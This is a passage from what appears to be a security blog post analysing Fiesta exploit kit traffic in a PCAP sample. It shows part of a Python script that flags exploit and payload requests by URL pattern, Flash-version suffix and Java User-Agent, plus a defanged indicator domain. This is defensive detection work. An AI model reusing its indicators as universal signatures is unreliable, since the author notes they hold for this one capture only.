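        reasons.append("64-hex path component under a short directory")
        suffix = m.group(1)
        if suffix:
            reasons.append("';digits' suffix " + suffix)
        fv = headers.get("x-flash-version")
        if fv and suffix and flash_version_from_suffix(suffix) == fv.replace(",", ""):
            reasons.append("suffix digits match x-flash-version " + fv)
    if JAVA_UA.search(headers.get("user-agent", "")):
        reasons.append("fetched by the Java runtime (Java/1.x User-Agent)")
    return {"host": headers.get("host", ""), "path": path,
            "score": len(reasons), "reasons": reasons}


def scan(requests=REQUESTS) -> List[Dict[str, object]]:
    """Classified requests with at least one hit, in capture order."""
    return [r for r in (classify(x) for x in requests) if r["score"]]


if __name__ == "__main__":
    for hit in scan():
        print(hit["score"], hit["host"], hit["path"][:40], hit["reasons"])
```

Running `scan()` flags the five `/v3_g1okw/<64 hex>` fetches and nothing from droidrzr[.]com. Two caveats a practitioner should keep in mind: the landing page itself (`/v3_g1okw/kSoNIfMf-YApwN_B7NtP`) does not match the 64-hex rule, so this catches the exploit and payload stage rather than the redirect, and the directory name and token length are what this one capture shows, not an invariant of the kit.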

One thought on “Fiesta-EK Exploit Kit Trying Shockwave Flash Silverlight Java PCAP Traffic Sample”

  1. Pingback: Joseph de Saram#Rhodium
